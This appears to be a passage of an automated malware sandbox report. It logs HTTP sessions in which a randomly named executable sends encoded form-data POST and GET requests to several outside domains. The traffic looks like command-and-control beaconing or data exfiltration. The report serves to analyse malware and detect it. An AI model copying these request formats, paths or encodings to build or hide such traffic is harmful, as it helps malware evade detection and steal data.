                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    51192.168.11.2049783185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:48.936840057 CEST2578OUTPOST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 36 79 41 78 35 42 69 45 6f 58 35 69 5a 39 39 53 31 47 57 4b 44 59 61 6e 64 70 68 48 4e 5a 53 34 4d 4f 32 72 44 4d 71 4e 66 65 71 7a 4b 73 73 77 51 31 50 42 65 61 4c 31 55 35 45 2f 4c 31 51 31 33 6a 57 4c 67 52 6d 41 65 42 55 4a 64 67 2b 45 62 72 44 56 4a 70 64 51 68 45 4c 77 6e 59 42 73 65 75 6a 33 71 68 31 4a 6c 50 57 74 35 61 5a 33 4c 66 56 6d 6a 34 63 4b 33 66 66 62 2b 49 62 54 71 31 4a 56 71 34 59 43 62 6f 48 79 6f 65 4c 75 35 46 43 43 61 43 74 69 47 4d 67 70 33 65 5a 4f 47 70 4f 63 6c 34 33 50 6f 36 4f 75 41 61 5a 7a 62 65 4f 6e 2b 50 5a 78 48 58 4e 4f 45 4d 6f 77 30 78 48 6d 32 33 38 6d 73 46 67 65 51 54 35 31 53 46 5a 35 68 57 57 4c 76 2b 6d 47 34 38 33 43 58 35 48 5a 2b 52 77 6c 57 30 6f 62 6e 79 45 77 54 4e 74 2b 39 6d 4a 6f 33 6c 56 30 48 34 43 2f 6a 63 64 76 71 4f 69 70 4f 4b 75 2b 30 48 52 63 30 73 51 44 2f 4e 56 69 69 65 38 69 65 43 50 54 46 6a 4e 50 34 2f 68 56 50 6f 58 48 6e 65 39 69 31 44 65 35 4c 6e 69 41 6a 71 57 4c 34 59 4f 69 77 6d [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN6yAx5BiEoX5iZ99S1GWKDYandphHNZS4MO2rDMqNfeqzKsswQ1PBeaL1U5E/L1Q13jWLgRmAeBUJdg+EbrDVJpdQhELwnYBseuj3qh1JlPWt5aZ3LfVmj4cK3ffb+IbTq1JVq4YCboHyoeLu5FCCaCtiGMgp3eZOGpOcl43Po6OuAaZzbeOn+PZxHXNOEMow0xHm238msFgeQT51SFZ5hWWLv+mG483CX5HZ+RwlW0obnyEwTNt+9mJo3lV0H4C/jcdvqOipOKu+0HRc0sQD/NViie8ieCPTFjNP4/hVPoXHne9i1De5LniAjqWL4YOiwmna1I0nkj83RPAuWERbHwFn4X6wTg5YRhfwuRM4TAdEDjjuktSsOWJyXFvw/nSq3gBv4AkW593/98STTD6Kd56imdZgrxkTjUfU+29iWVPmmCdR4Y8NUrTdDpwZYOrgl32eCud+/Ak+7jr3ZRa4H0xfmPksITEw7LhSXkLlUOYY/Ilmu1Go4PwP+wuzPnNys+Mm4TXLE/8uZ9MJ/V0V25KUDaSOs+dfKTPyTtEzAA0yW+8IdvvDib+prE2f+VbEiyYfiYzqngg0vg0OY1XOjmHJdPqOeLt6EpwYvGFn8oT0hB0wpjktUaAXh7XCYMl9tMVM4DGrbAZjXOy8oYTuRujqyqjpwSUwPTwsMC9WI7BnCH5pEBAguZdGdKfCGz37zP8CerdlGFdMkizdyQLm3HM4td4K7wVko2OMmcDzhwWA0Sb1wOT2VMBMsylYzHy9vmMJXJTxCBqgKazkwlhOTHMRpPyiuFiu4o5U+h/ENeHG74aBkoEl1Cngr/QKazDI71v7GvmP1quJDU1SDsORh3npSdvAiKjQDTGRy3X8opBZwgBpqdb8yP66kCTd5ktvVye1RkedZ4sKFwm+58p53BztL/V4nxVjR1KbXmMYELEB019AJy6WeujrIDloVb5IZhsCfX8pmkxvrwsO48EYbVG/Sc0WPdoxTAaK [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:01:48.936860085 CEST4355OUTData Raw: 63 68 2f 33 70 4e 4a 46 4c 76 63 54 32 2f 79 76 75 36 33 4c 66 6a 48 48 2f 48 58 76 2f 31 35 57 4c 51 58 36 6b 51 6e 64 72 58 65 57 65 6c 67 54 65 4b 6b 55 79 51 59 6a 6b 67 52 56 51 70 36 49 4e 2f 57 57 50 37 38 4a 4d 38 4e 73 65 44 34 44 6b 2f
                                                                                                                                                    Data Ascii: ch/3pNJFLvcT2/yvu63LfjHH/HXv/15WLQX6kQndrXeWelgTeKkUyQYjkgRVQp6IN/WWP78JM8NseD4Dk/k2D5AvqwW2NSVd2osfBEkBMUfg60oqAqWtEQbcISeMc/MKh3iLvWHqld//wgNWKckWDCRAAYDiC8PlkFBRjpUL1nP9SgbKDxJPNQBCeBHebTFXLUQKDMbCAiuJ1bDJyJyeku3RoHQsfpN0hlbUWZtBqBl2pkN1/4I
                                                                                                                                                    Oct 4, 2024 12:01:49.129652023 CEST313INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:49 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    52192.168.11.2049784185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:51.657408953 CEST434OUTGET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:01:51.854226112 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:51 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Expires: Fri, 04 Oct 2024 11:01:51 GMT
                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                    Cache-Control: public
                                                                                                                                                    Data Raw: 31 35 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 73 74 72 61 74 65 67 79 76 61 6e 67 75 61 72 64 2e 63 6f 6d 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b [TRUNCATED]
                                                                                                                                                    Data Ascii: 1560<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.strategyvanguard.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:01:51.854379892 CEST1289INData Raw: 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 74
                                                                                                                                                    Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { posi
                                                                                                                                                    Oct 4, 2024 12:01:51.854397058 CEST1289INData Raw: 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 6e 61 6d 65 73 68 6f 70 2e 63 6f 6d 2f 77 68 6f 69 73 22 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 3e 27 2c 0a
                                                                                                                                                    Data Ascii: <br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.strategyvanguard.com') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vr
                                                                                                                                                    Oct 4, 2024 12:01:51.854409933 CEST1289INData Raw: 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 74 22 3e 0a 20 20 20 20 20 20 20 20 77 77 77 2e 73 74 72 61
                                                                                                                                                    Data Ascii: } </script> <div class="container"> <h1 id="t"> www.strategyvanguard.com is parked </h1> <p id="m"> www.strategyvanguard.com is registered, but the owner currently does not have an
                                                                                                                                                    Oct 4, 2024 12:01:51.854533911 CEST587INData Raw: 65 72 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 3e 44 6f 6d 65 6e 65 73 68 6f 70 20 41 53 20 26 63 6f 70 79 3b 0a 20 20 20 20 20 20 20 20 32 30 32 34 3c 2f 73 70 61 6e 0a 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 26 6d
                                                                                                                                                    Data Ascii: er"> <span >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 29fd225fdc06aeb618743fcb21e15e73/parkedweb01 </span> </div> <script> q("ls").setAttribute("s


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    53192.168.11.2049785184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:56.964999914 CEST699OUTPOST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 72 35 41 54 2f 44 71 39 78 42 7a 4a 58 55 66 62 31 6e 6d 71 56 63 45 4d 74 61 65 65 37 36 79 76 74 6c 31 48 6a 70 49 30 53 33 7a 79 69 56 49 31 49 5a 50 6f 46 4c 43 38 6f 57 63 4f 52 56 37 66 51 70 64 49 44 55 6b 71 58 5a 41 79 65 6d 6a 59 33 43 6b 65 68 36 63 65 44 71 77 2b 74 76 74 37 6c 56 6d 71 48 76 50 75 31 38 63 50 2f 52 67 54 39 4b 34 38 76 30 30 6a 49 31 50 4f 70 71 43 7a 72 41 59 73 43 6b 46 36 70 53 58 6f 4b 36 47 7a 4c 41 66 6f 63 77 66 4d 47 77 5a 6a 4f 45 67 5a 46 71 6c 75 46 72 34 4a 47 53 7a 55 5a 65 6e 55 4a 46 70 75 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNr5AT/Dq9xBzJXUfb1nmqVcEMtaee76yvtl1HjpI0S3zyiVI1IZPoFLC8oWcORV7fQpdIDUkqXZAyemjY3Ckeh6ceDqw+tvt7lVmqHvPu18cP/RgT9K48v00jI1POpqCzrAYsCkF6pSXoK6GzLAfocwfMGwZjOEgZFqluFr4JGSzUZenUJFpuQ==
                                                                                                                                                    Oct 4, 2024 12:01:57.074228048 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:57 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:01:57.074249983 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 12:01:57.074350119 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 12:01:57.074362040 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 12:01:57.074374914 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 12:01:57.074385881 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 12:01:57.074397087 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 12:01:57.074409008 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 12:01:57.074419975 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 12:01:57.074558020 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    54192.168.11.2049786184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:59.589422941 CEST719OUTPOST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 4c 4a 41 52 59 66 71 70 68 42 77 46 33 55 66 4e 46 6e 69 71 56 41 45 4d 73 4f 4f 65 4f 53 79 76 4d 56 31 47 69 70 49 33 53 33 7a 36 43 56 4a 6f 34 5a 36 6f 46 48 38 38 70 71 63 4f 51 78 37 66 53 78 64 49 30 41 6a 72 48 5a 43 6d 75 6d 68 58 58 43 6b 65 68 36 63 65 44 50 58 2b 73 4c 74 37 56 46 6d 72 6d 76 4d 78 46 38 54 49 2f 52 67 46 4e 4c 2f 38 76 30 4b 6a 4a 70 6c 4f 72 43 43 7a 70 49 59 39 77 41 47 30 70 53 52 73 4b 37 4a 2b 4b 51 54 6e 76 51 75 64 30 52 47 74 64 59 49 56 7a 37 2f 7a 33 66 63 4b 56 4f 42 51 70 6e 50 57 4c 45 79 7a 62 4c 4b 50 71 6c 4e 6c 72 78 4b 4d 4f 78 57 32 44 55 4e 36 35 49 3d
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNLJARYfqphBwF3UfNFniqVAEMsOOeOSyvMV1GipI3S3z6CVJo4Z6oFH88pqcOQx7fSxdI0AjrHZCmumhXXCkeh6ceDPX+sLt7VFmrmvMxF8TI/RgFNL/8v0KjJplOrCCzpIY9wAG0pSRsK7J+KQTnvQud0RGtdYIVz7/z3fcKVOBQpnPWLEyzbLKPqlNlrxKMOxW2DUN65I=
                                                                                                                                                    Oct 4, 2024 12:01:59.690645933 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:59 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
